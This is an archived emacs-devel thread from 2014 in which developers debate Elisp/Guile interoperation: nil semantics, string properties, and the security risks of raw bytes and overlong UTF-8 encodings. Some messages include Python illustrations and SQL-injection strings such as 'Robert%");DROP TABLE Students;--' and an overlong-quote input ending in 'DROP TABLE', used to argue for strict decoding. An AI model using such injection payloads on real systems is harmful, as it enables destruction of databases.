> While we're on the subject of interoperability between Emacs Lisp and
> Scheme programs, I'm concerned about nil.

[...]

> The problem comes when 'x' originated in Scheme code as (), is later
> copied by Elisp code into something that's conceptually a boolean, and
> then that copy is inspected by Scheme code.  The intent was that the
> copied boolean would be false, but the Scheme code will see () and treat
> it as true.
>
> What do you think?  Do I worry too much? :)

No.  It will be the main recurring interoperation headache.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
  2014-10-05  9:01                                     ` David Kastrup
@ 2014-10-05 10:43                                     ` Stephen J. Turnbull
  2014-10-05 11:10                                       ` David Kastrup
  2014-10-05 14:30                                       ` Mark H Weaver
  2014-10-05 21:49                                     ` Richard Stallman
  2014-10-05 21:49                                     ` Richard Stallman
  3 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-05 10:43 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

Mark H Weaver writes:

 > I would like to change Guile's internal string representation to use a
 > generalization of UTF-8, as used by Emacs.  There are two sticking
 > points that require more thought, however:
 > 
 > * I'm concerned that there are security implications to supporting
 >   the "raw byte" code points.

There are greater security implications to using the full repertoire
of Unicode (so-called confusables for a start).

 >   However, I think this will not be a problem, because the
 >   string<->bytevector conversion procedures could support two modes of
 >   operation: one mode that supports these raw bytes, for use by emacs
 >   and maybe some other purposes (e.g. dealing with POSIX file names),
 >   and another mode that refuses to accept or produce invalid UTF-8,

I'm not sure what you mean by "mode", but this behavior should be
decided for each stream.  IMO Python does this correctly (although its
internal representation is fixed-width, not UTF-8).  Specifically, raw
bytes in I/O streams are treated as errors, and when encountered an
error handler (which is specified stream-by-stream) decides how to
treat them.

Besides the in band "special character" representation, 'strict'
(raise error) must be provided.

Other handlers provided by Python include 'ignore' (drop from the
stream), 'replace' (with a constant replacement character),
'backslashreplace' (replace with a backslash escape such as
"\U0001f4a9") and 'xmlcharrefreplace' (replace with an XML numeric
character reference).
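
As a rough illustration of the per-stream handlers, the following
sketch uses only the standard CPython 3 codec machinery.  The variable
names are arbitrary, and 'surrogateescape' stands in here for the
in-band "special character" representation; it is Python's mechanism,
not the Emacs one.

```python
raw = b"caf\xff"   # 0xFF can never appear in valid UTF-8

# 'strict' is the default: invalid input raises an error.
try:
    raw.decode("utf-8", errors="strict")
    strict_result = "accepted"
except UnicodeDecodeError:
    strict_result = "rejected"

ignored = raw.decode("utf-8", errors="ignore")            # drops the byte
replaced = raw.decode("utf-8", errors="replace")          # inserts U+FFFD
escaped = raw.decode("utf-8", errors="surrogateescape")   # in-band raw byte

# The in-band form round-trips back to the original bytes.
assert escaped.encode("utf-8", errors="surrogateescape") == raw

# Encoding-side handlers for characters the target codec lacks.
pile = "\U0001F4A9"
as_backslash = pile.encode("ascii", errors="backslashreplace")
as_xml = pile.encode("ascii", errors="xmlcharrefreplace")

print(strict_result, repr(ignored), as_backslash, as_xml)
```

The handler is chosen at each decode or encode call, which is what
makes a stream-by-stream policy possible.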

 > Supporting property lists in Scheme raises difficult questions
 > such as:

Difficult, really?

 >  * What should the Scheme procedures 'string=?' and 'equal?' do when
 >    comparing two strings with equal character sequences but
 >    unequal property lists?

Ignore the property list.

 >  * Should Scheme procedures such as 'substring', 'string-append',
 >    'string-upcase', etc, propagate the associated property list
 >    data?

Ignore the property list.

 >  * Are there security implications to carrying around and possibly
 >    propagating (via Scheme's "substring") extra information that is
 >    effectively invisible to all procedures that have ever been
 >    available in Scheme?

Ignore the property list.

 >  * What should Scheme's 'write' do when applied to a string that
 >    includes a property list?  ('write' is analogous to 'prin1').

Ignore the property list.

There, that wasn't hard, was it?

Scheme itself really needs only to provide a setter and a getter for
the property list, and leave everything else up to Emacs (at first,
anyway).  If you're really worried about the security implications,
provide an interpreter instance switch at invocation time (or even
compile time) so that feature is only available in invocations that
explicitly request it.  This would default to on for Emacs processes,
off for "vanilla" Guile, and other applications that embed special
configurations of Guile can make their own choice.

 > Security concerns are more important for Guile than for Emacs, because
 > Guile is already being used to implement network programs such as web
 > servers, and generally aims to support a much wider range of
 > applications.

Obviously, you don't know Emacs very well.  Emacs is the Swiss Army
knife of the software world.  It is an operating system, a system
library, an application development platform and an application.  (We
also walk dogs.)

 > What do you think?  Do I worry too much [about nothing]? :)

Listen to your Uncle David on this one.  You should treat every
instance of nil as a biohazard.





* Re: Emacs Lisp's future
  2014-10-05 10:43                                     ` Stephen J. Turnbull
@ 2014-10-05 11:10                                       ` David Kastrup
  2014-10-05 11:56                                         ` Stephen J. Turnbull
  2014-10-05 14:30                                       ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-05 11:10 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

>  > What do you think?  Do I worry too much [about nothing]? :)
>
> Listen to your Uncle David on this one.  You should treat every
> instance of nil as a biohazard.

That would make about as much sense as treating every bacterium as a
biohazard.  The nil problem is going to be defining the relation between
Elisp and Scheme programming like pointers define the relation between C
and algorithms.

The Fortran language is defined in a manner that when you use aliasing,
anything can happen.

The C language is defined in a manner that when you don't use aliasing,
nothing can happen.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-05 11:10                                       ` David Kastrup
@ 2014-10-05 11:56                                         ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-05 11:56 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

David Kastrup writes:

 > like pointers define the relation between C and algorithms.

Did somebody mention biohazards?

It seems to me that the analogy between passing Lisp nil to Scheme and
passing C pointers to anything is quite good at a high level.  Every
instance must be checked up, down, and sideways for possible hazards.




* Re: Emacs Lisp's future
  2014-10-05 10:43                                     ` Stephen J. Turnbull
  2014-10-05 11:10                                       ` David Kastrup
@ 2014-10-05 14:30                                       ` Mark H Weaver
  2014-10-05 15:48                                         ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-05 14:30 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

>  > What do you think?  Do I worry too much [about nothing]? :)
>
> Listen to your Uncle David on this one.  You should treat every
> instance of nil as a biohazard.

If you had actually read what I wrote, you'd know that in the case I
outlined, there is no instance of nil at all.

      Mark




* Re: Emacs Lisp's future
  2014-10-05 14:30                                       ` Mark H Weaver
@ 2014-10-05 15:48                                         ` Stephen J. Turnbull
  2014-10-05 18:29                                           ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-05 15:48 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

Mark H Weaver writes:

 > in the case I outlined, there is no instance of nil at all.

If you say so.







* Re: Emacs Lisp's future
  2014-10-05 15:48                                         ` Stephen J. Turnbull
@ 2014-10-05 18:29                                           ` Mark H Weaver
  0 siblings, 0 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-05 18:29 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa,
	Stefan Monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Mark H Weaver writes:
>
>  > in the case I outlined, there is no instance of nil at all.
>
> If you say so.

Am I mistaken?  Where is the instance of nil?

    Mark




* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
  2014-10-05  9:01                                     ` David Kastrup
  2014-10-05 10:43                                     ` Stephen J. Turnbull
@ 2014-10-05 21:49                                     ` Richard Stallman
       [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
                                                         ` (2 more replies)
  2014-10-05 21:49                                     ` Richard Stallman
  3 siblings, 3 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-05 21:49 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    * I'm concerned that there are security implications to supporting the
      "raw byte" code points.  I can expand on this more if you'd like.

I'd like to know how it is that "raw bytes" have security implications.
Are there programs that make assumptions about the contents of strings?
That seems like bad design.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-05  7:53                                   ` Mark H Weaver
                                                       ` (2 preceding siblings ...)
  2014-10-05 21:49                                     ` Richard Stallman
@ 2014-10-05 21:49                                     ` Richard Stallman
  2014-10-06  3:34                                       ` Stephen J. Turnbull
  2014-10-10 20:41                                       ` Mark H Weaver
  3 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-05 21:49 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Supporting property lists in Scheme raises difficult questions

Do you mean text properties in strings, as in Emacs Lisp?  These are
more complicated than an ordinary property list on an object as a
whole.

    such as:

     * What should the Scheme procedures 'string=?' and 'equal?' do when
       comparing two strings with equal character sequences but
       unequal property lists?

     * Should Scheme procedures such as 'substring', 'string-append',
       'string-upcase', etc, propagate the associated property list
       data?

     * What should Scheme's 'write' do when applied to a string that
       includes a property list?  ('write' is analogous to 'prin1').

The obvious first suggestion is to handle each one as Emacs Lisp does.
For printing, a different syntax might be needed to fit in with Scheme
printed representation conventions, but that is ok.

     * Are there security implications to carrying around and possibly
       propagating (via Scheme's "substring") extra information that is
       effectively invisible to all procedures that have ever been
       available in Scheme?

There are many ways to pass data from one piece of Scheme code to
another.  Is there any real, usable "security" now, that this would
reduce?  Can you give an example?

Given a self-contained Scheme program, it should be easy to determine
whether it ever examines or sets string text properties.  Is that enough
to provide the same "security" benefits in practice?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
       [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
@ 2014-10-06  3:18                                       ` Stephen J. Turnbull
  2014-10-06 19:15                                         ` Richard Stallman
  2014-10-06  6:21                                       ` Mark H Weaver
  2 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06  3:18 UTC (permalink / raw)
  To: rms; +Cc: dak, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > I'd like to know how it is that "raw bytes" have security implications.
 > Are there programs that make assumptions about the contents of strings?
 > That seems like bad design.

Yes, they do, and no, it's poor implementation, not bad design --
they're conforming to standards that say that string contents will
have a specific form and are unfortunately imperfectly protected from
invalid input by their I/O modules (for example, the \201 bug in Emacs
itself).

As a consequence it's often possible to crash a program that is
incompletely robust to invalid encodings.  If that program is a
spam/virus checker, and the problem is compounded by a site policy
that accepts mail when the checker fails, anything can happen.

That's just an example.





* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
@ 2014-10-06  3:34                                       ` Stephen J. Turnbull
  2014-10-08  0:48                                         ` Richard Stallman
  2014-10-10 20:41                                       ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06  3:34 UTC (permalink / raw)
  To: rms; +Cc: dak, Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > Given a self-contained Scheme program, it should be easy to determine
 > whether it ever examines or sets string text properties.  Is that enough
 > to provide the same "security" benefits in practice?

No.  Often systems are constructed by assembling separately developed
modules.  If a "security" module responsible for checking data
validity is property-oblivious, then maliciously crafted properties
may be able to cause "evil" behavior in a property-sensitive module
supposedly protected by the "security" module.
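
A minimal sketch of that pattern, in Python rather than Scheme: the
PropString class, the 'on-click' property and both functions are
hypothetical stand-ins made up for this example, not anything that
exists in Guile or Emacs.

```python
class PropString(str):
    """A str carrying an extra, normally invisible, property dict."""

    def __new__(cls, text, props=None):
        obj = super().__new__(cls, text)
        obj.props = dict(props or {})
        return obj


def validate(s):
    """Older 'security' module: inspects characters only."""
    return s.isalnum()


def render(s):
    """Newer module: honours a hypothetical 'on-click' property."""
    action = getattr(s, "props", {}).get("on-click")
    return f"{s} [runs: {action}]" if action else str(s)


label = PropString("hello", {"on-click": "delete-all-files"})
assert validate(label)     # passes: the characters are harmless
print(render(label))       # prints: hello [runs: delete-all-files]
```

The validator is not wrong about the characters; it simply has no way
to know that there is anything else to look at.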

This kind of problem is often exposed when the "security" module was
designed for a Scheme version without some feature (here "string
properties"), and the infrastructure is updated to an interpreter
version with the feature.

You can impugn the skills of the programmers responsible, or say it's
all very hypothetical (I admit that, not being a cracker myself, I
don't know how to turn such configurations into actual exploits), but
this is a common pattern for security breaches.  It's a great service
to the Internet community for the Guile developers to worry about it
and at least document the issues faced when using Guile.





* Re: Emacs Lisp's future
  2014-10-05 21:49                                     ` Richard Stallman
       [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
  2014-10-06  3:18                                       ` Stephen J. Turnbull
@ 2014-10-06  6:21                                       ` Mark H Weaver
  2014-10-06 15:08                                         ` Eli Zaretskii
  2014-10-11 18:34                                         ` Florian Weimer
  2 siblings, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-06  6:21 UTC (permalink / raw)
  To: rms; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

>     * I'm concerned that there are security implications to supporting the
>       "raw byte" code points.  I can expand on this more if you'd like.
>
> I'd like to know how it is that "raw bytes" have security implications.

To give an example, consider a procedure that needs to pass a string
from an untrusted source to an SQL query.  To do this safely, it needs
to quote the string.  I haven't researched how to properly quote SQL
string literals, but in general, quoting is typically done by
recognizing some set of special characters that must be escaped, and
allowing all other characters through unmodified.

However, "raw byte" code points can be used to bypass such a quoting
mechanism, and thus send an unescaped closing quote to the SQL database
followed by arbitrary SQL commands.

A related problem has to do with the fact that naively implemented UTF-8
allows code points to be represented with more bytes than are actually
needed, essentially by padding the code point with leading zeroes and
then encoding with UTF-8 as if the high bits were non-zero.  For
example, the ASCII quote (") can be represented as the single byte 0x22,
the two byte sequence 0xC0 0xA2, etc.

UTF-8 decoders are supposed to detect and reject these "overlong"
encodings, but it is likely that many programs fail to do this.  Such
programs are usually vulnerable to these overlong encodings when trying
to detect special characters (e.g. for quoting/escaping) or when
validating inputs.
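
The following Python sketch shows how such a bypass could look.  Both
functions are deliberately simplified, hypothetical examples: the
filter works on bytes, and the decoder is intentionally broken in that
it never checks whether a two-byte form was actually necessary.

```python
def escape_quotes(data: bytes) -> bytes:
    """Byte-level filter: backslash-escape every literal 0x22 byte."""
    return data.replace(b'"', b'\\"')


def naive_utf8_decode(data: bytes) -> str:
    """Deliberately broken decoder: handles 1- and 2-byte forms only
    and accepts overlong 2-byte sequences."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("unsupported byte in this sketch")
    return "".join(out)


attack = b"x\xc0\xa2; DROP TABLE t"    # overlong encoding of '"'
filtered = escape_quotes(attack)        # filter sees no 0x22 byte
assert filtered == attack               # so nothing was escaped

leaked = naive_utf8_decode(filtered)    # the quote appears after filtering
assert leaked == 'x"; DROP TABLE t'

# A conforming decoder (here CPython's) refuses the same input.
try:
    attack.decode("utf-8")
    conforming = "accepted"
except UnicodeDecodeError:
    conforming = "rejected"
print(conforming)                       # prints rejected
```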

To cope with this, the Unicode standards require that UTF-8 codecs
reject overlong encodings and other invalid byte sequences.  This is in
direct conflict with the idea of "raw byte" code points, whose purpose
is to be tolerant of arbitrary byte sequences and to propagate them
unchanged.

FWIW, I agree that the Emacs behavior is desirable when editing a file
that may contain coding errors, but in most other cases (e.g. when
communicating with processes or network sockets) I think that it's more
appropriate to refuse to accept, produce, or propagate invalid UTF-8
such as overlong encodings.

      Mark




* Re: Emacs Lisp's future
  2014-10-06  6:21                                       ` Mark H Weaver
@ 2014-10-06 15:08                                         ` Eli Zaretskii
  2014-10-06 15:33                                           ` David Kastrup
  2014-10-06 16:27                                           ` Mark H Weaver
  2014-10-11 18:34                                         ` Florian Weimer
  1 sibling, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-06 15:08 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: monnier@iro.umontreal.ca,  dak@gnu.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  eliz@gnu.org,  stephen@xemacs.org
> Date: Mon, 06 Oct 2014 02:21:41 -0400
> 
> A related problem has to do with the fact that naively implemented UTF-8
> allows code points to be represented with more bytes than are actually
> needed, essentially by padding the code point with leading zeroes and
> then encoding with UTF-8 as if the high bits were non-zero.  For
> example, the ASCII quote (") can be represented as the single byte 0x22,
> the two byte sequence 0xC0 0xA2, etc.
> 
> UTF-8 decoders are supposed to detect and reject these "overlong"
> encodings, but it is likely that many programs fail to do this.  Such
> programs are usually vulnerable to these overlong encodings when trying
> to detect special characters (e.g. for quoting/escaping) or when
> validating inputs.
> 
> To cope with this, the Unicode standards require that UTF-8 codecs
> reject overlong encodings and other invalid byte sequences.  This is in
> direct conflict with the idea of "raw byte" code points, whose purpose
> is to be tolerant of arbitrary byte sequences and to propagate them
> unchanged.

The obvious solution is to encode the raw bytes internally in a UTF-8
compatible way.  Which is what Emacs does in its buffers and strings,
as I'm sure you know.  Can't Guile do something similar?

> FWIW, I agree that the Emacs behavior is desirable when editing a file
> that may contain coding errors, but in most other cases (e.g. when
> communicating with processes or network sockets) I think that it's more
> appropriate to refuse to accept, produce, or propagate invalid UTF-8
> such as overlong encodings.

Emacs indeed rejects them, but that doesn't mean it disallows raw
bytes as part of otherwise valid UTF-8 content.  It's a fact of life
that such stray bytes sometimes happen, and users would be generally
unhappy if Emacs would reject a file because it had such bytes.




* Re: Emacs Lisp's future
  2014-10-06 15:08                                         ` Eli Zaretskii
@ 2014-10-06 15:33                                           ` David Kastrup
  2014-10-06 16:24                                             ` Eli Zaretskii
  2014-10-06 16:27                                           ` Mark H Weaver
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 15:33 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: Mark H Weaver <mhw@netris.org>
>> Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org
>> Date: Mon, 06 Oct 2014 02:21:41 -0400
>> 
>> A related problem has to do with the fact that naively implemented UTF-8
>> allows code points to be represented with more bytes than are actually
>> needed, essentially by padding the code point with leading zeroes and
>> then encoding with UTF-8 as if the high bits were non-zero.  For
>> example, the ASCII quote (") can be represented as the single byte 0x22,
>> the two byte sequence 0xC0 0xA2, etc.
>> 
>> UTF-8 decoders are supposed to detect and reject these "overlong"
>> encodings, but it is likely that many programs fail to do this.  Such
>> programs are usually vulnerable to these overlong encodings when trying
>> to detect special characters (e.g. for quoting/escaping) or when
>> validating inputs.
>> 
>> To cope with this, the Unicode standards require that UTF-8 codecs
>> reject overlong encodings and other invalid byte sequences.  This is in
>> direct conflict with the idea of "raw byte" code points, whose purpose
>> is to be tolerant of arbitrary byte sequences and to propagate them
>> unchanged.
>
> The obvious solution is to encode the raw bytes internally in a UTF-8
> compatible way.  Which is what Emacs does in its buffers and strings,
> as I'm sure you know.  Can't Guile do something similar?

If an overlong UTF-8 byte sequence representing '"' is processed
transparently by Emacs, it will be reencoded into the original
afterwards and depending on the next processing stage might trip up
software afterwards.  Of course, it would have done equally so without
Emacs (or GUILE) in the middle.  The solution obviously is to use a
coding scheme for recoding that does _not_ reproduce unencodable bytes.
Now if the intermediate processing added escape characters for the
unencodable bytes, you can arrive at something like (using % for
unencodable)

[Input] Robert%");DROP TABLE Students;--
[quotified] "Robert\%\");DROP TABLE Students;--"
[cleanencoded] "Robert\\");DROP TABLE Students;--"
[Pasted into SQL command] Uh oh.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-06 15:33                                           ` David Kastrup
@ 2014-10-06 16:24                                             ` Eli Zaretskii
  2014-10-06 16:40                                               ` David Kastrup
  2014-10-06 17:04                                               ` Stephen J. Turnbull
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-06 16:24 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> From: David Kastrup <dak@gnu.org>
> Cc: Mark H Weaver <mhw@netris.org>,  rms@gnu.org,  monnier@iro.umontreal.ca,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  stephen@xemacs.org
> Date: Mon, 06 Oct 2014 17:33:21 +0200
> 
> If an overlong UTF-8 byte sequence representing '"' is processed
> transparently by Emacs, it will be reencoded into the original
> afterwards and depending on the next processing stage might trip up
> software afterwards.

Indeed.  But that's what is expected from an editor: not to change the
stuff the user didn't touch.

> Of course, it would have done equally so without Emacs (or GUILE) in
> the middle.

Right.

> The solution obviously is to use a coding scheme for recoding that
> does _not_ reproduce unencodable bytes.

An editor such as Emacs cannot do that, I think.




* Re: Emacs Lisp's future
  2014-10-06 15:08                                         ` Eli Zaretskii
  2014-10-06 15:33                                           ` David Kastrup
@ 2014-10-06 16:27                                           ` Mark H Weaver
  2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 19:17                                             ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-06 16:27 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: Mark H Weaver <mhw@netris.org>
>> Cc: monnier@iro.umontreal.ca, dak@gnu.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, eliz@gnu.org, stephen@xemacs.org
>> Date: Mon, 06 Oct 2014 02:21:41 -0400
>> 
>> A related problem has to do with the fact that naively implemented UTF-8
>> allows code points to be represented with more bytes than are actually
>> needed, essentially by padding the code point with leading zeroes and
>> then encoding with UTF-8 as if the high bits were non-zero.  For
>> example, the ASCII quote (") can be represented as the single byte 0x22,
>> the two byte sequence 0xC0 0xA2, etc.
>> 
>> UTF-8 decoders are supposed to detect and reject these "overlong"
>> encodings, but it is likely that many programs fail to do this.  Such
>> programs are usually vulnerable to these overlong encodings when trying
>> to detect special characters (e.g. for quoting/escaping) or when
>> validating inputs.
>> 
>> To cope with this, the Unicode standards require that UTF-8 codecs
>> reject overlong encodings and other invalid byte sequences.  This is in
>> direct conflict with the idea of "raw byte" code points, whose purpose
>> is to be tolerant of arbitrary byte sequences and to propagate them
>> unchanged.
>
> The obvious solution is to encode the raw bytes internally in a UTF-8
> compatible way.  Which is what Emacs does in its buffers and strings,
> as I'm sure you know.  Can't Guile do something similar?

I'm afraid you've misunderstood, or perhaps I've failed to explain it
clearly.

It doesn't matter how these raw bytes are encoded internally.  No matter
what mechanism we use to accomplish it, propagating invalid byte
sequences by default is bad security policy.  It has the effect of
exposing all internal subsystems to malformed UTF-8 such as overlong
encodings unless users take explicit steps to check for them and remove
them.  This is a recipe for security holes.
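
To make the overlong case concrete, here is a minimal Python sketch. It is not taken from Emacs or Guile; the helper names `naive_decode_2byte` and `strict_decode` are hypothetical and exist only for illustration. It shows how a decoder that skips the overlong check turns the bytes 0xC0 0xA2 into an ASCII quote, while a strict decoder rejects them.

```python
def naive_decode_2byte(data: bytes) -> str:
    """Decode a 2-byte UTF-8 sequence WITHOUT checking for overlong forms.

    Hypothetical helper: this is the kind of decoder the thread warns about.
    """
    lead, cont = data
    # Take 5 payload bits from the lead byte and 6 from the continuation byte.
    return chr(((lead & 0x1F) << 6) | (cont & 0x3F))


def strict_decode(data: bytes):
    """Return the decoded text, or None if the bytes are not valid UTF-8."""
    try:
        return data.decode("utf-8")  # Python's built-in codec is strict by default
    except UnicodeDecodeError:
        return None


overlong_quote = bytes([0xC0, 0xA2])

naive_result = naive_decode_2byte(overlong_quote)   # yields the quote character
strict_result = strict_decode(overlong_quote)       # rejected, so None
```

A filter that scans for the single byte 0x22 before handing data to the naive decoder would never see the quote, which is the quoting/escaping hazard described above.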

The Unicode standard requires that all UTF-8 codecs refuse to accept,
produce, or propagate invalid byte sequences, including the troublesome
overlong encodings.  I'm not one for blindly following standards, but in
my opinion this is the default policy we should adopt.

Editing files is an unusual case.  Of course, we want users to be able
to edit a file with coding errors, and to leave any part of the file
untouched by the user exactly as it was.  Anything else would be a
mistake.

However, I would argue that even in Emacs, string<->bytevector
conversions should be strict by default, so that their other uses
(e.g. communication over sockets, pipes, and encoding of command-line
arguments to subprocesses) are strict unless explicitly relaxed.  Even
if you disagree, I'd like the strict mode to remain the default in Guile.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:24                                             ` Eli Zaretskii
@ 2014-10-06 16:40                                               ` David Kastrup
  2014-10-06 17:04                                               ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-06 16:40 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: Mark H Weaver <mhw@netris.org>, rms@gnu.org,
>> monnier@iro.umontreal.ca, dmantipov@yandex.ru, emacs-devel@gnu.org,
>> handa@gnu.org, stephen@xemacs.org
>> Date: Mon, 06 Oct 2014 17:33:21 +0200
>> 
>> If an overlong UTF-8 byte sequence representing '"' is processed
>> transparently by Emacs, it will be reencoded into the original
>> afterwards and depending on the next processing stage might trip up
>> software afterwards.
>
> Indeed.  But that's what is expected from an editor: not to change the
> stuff the user didn't touch.
>
>> Of course, it would have done equally so without Emacs (or GUILE) in
>> the middle.
>
> Right.
>
>> The solution obviously is to use a coding scheme for recoding that
>> does _not_ reproduce unencodable bytes.
>
> An editor such as Emacs cannot do that, I think.

It sure can.  Saving with a different encoding system than the one you
started with is always an option.  Not all encoding system variants need
to be lossless, and the choice how to treat non-encodable bytes can be
part of the coding system variant.
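
As a rough illustration of a lossy variant, here is a Python sketch in which the treatment of non-decodable bytes is a parameter of the save step. The function name `save_lossy` and the two policy names are assumptions borrowed from Python's codec error handlers; they are not Emacs coding systems.

```python
def save_lossy(data: bytes, policy: str = "replace") -> bytes:
    """Re-encode `data` as valid UTF-8, discarding what cannot be decoded.

    policy="replace": each undecodable byte becomes U+FFFD.
    policy="ignore":  each undecodable byte is silently dropped.
    """
    if policy not in ("replace", "ignore"):
        raise ValueError("unknown policy: " + policy)
    text = data.decode("utf-8", errors=policy)
    return text.encode("utf-8")  # the output is always well-formed UTF-8


original = b"say \xc0\xa2hi\xc0\xa2"        # contains two overlong quotes
replaced = save_lossy(original, "replace")
dropped = save_lossy(original, "ignore")
```

Either policy yields output that a strict UTF-8 consumer will accept, at the cost of no longer reproducing the input byte for byte.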

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:27                                           ` Mark H Weaver
@ 2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 17:31                                               ` David Kastrup
                                                                 ` (3 more replies)
  2014-10-06 19:17                                             ` Richard Stallman
  1 sibling, 4 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-06 16:47 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: dak@gnu.org,  rms@gnu.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Mon, 06 Oct 2014 12:27:35 -0400
> 
> > The obvious solution is to encode the raw bytes internally in a UTF-8
> > compatible way.  Which is what Emacs does in its buffers and strings,
> > as I'm sure you know.  Can't Guile do something similar?
> 
> I'm afraid you've misunderstood, or perhaps I've failed to explain it
> clearly.

I think I did understand your perfectly clear explanation.

> It doesn't matter how these raw bytes are encoded internally.  No matter
> what mechanism we use to accomplish it, propagating invalid byte
> sequences by default is bad security policy.

How can we be responsible for byte streams that originated outside?
That's the responsibility of the source.  And if there is a consumer,
then it is their responsibility not to trip upon such bytes.

But how can you refuse to copy such bytes when you are just a pipe
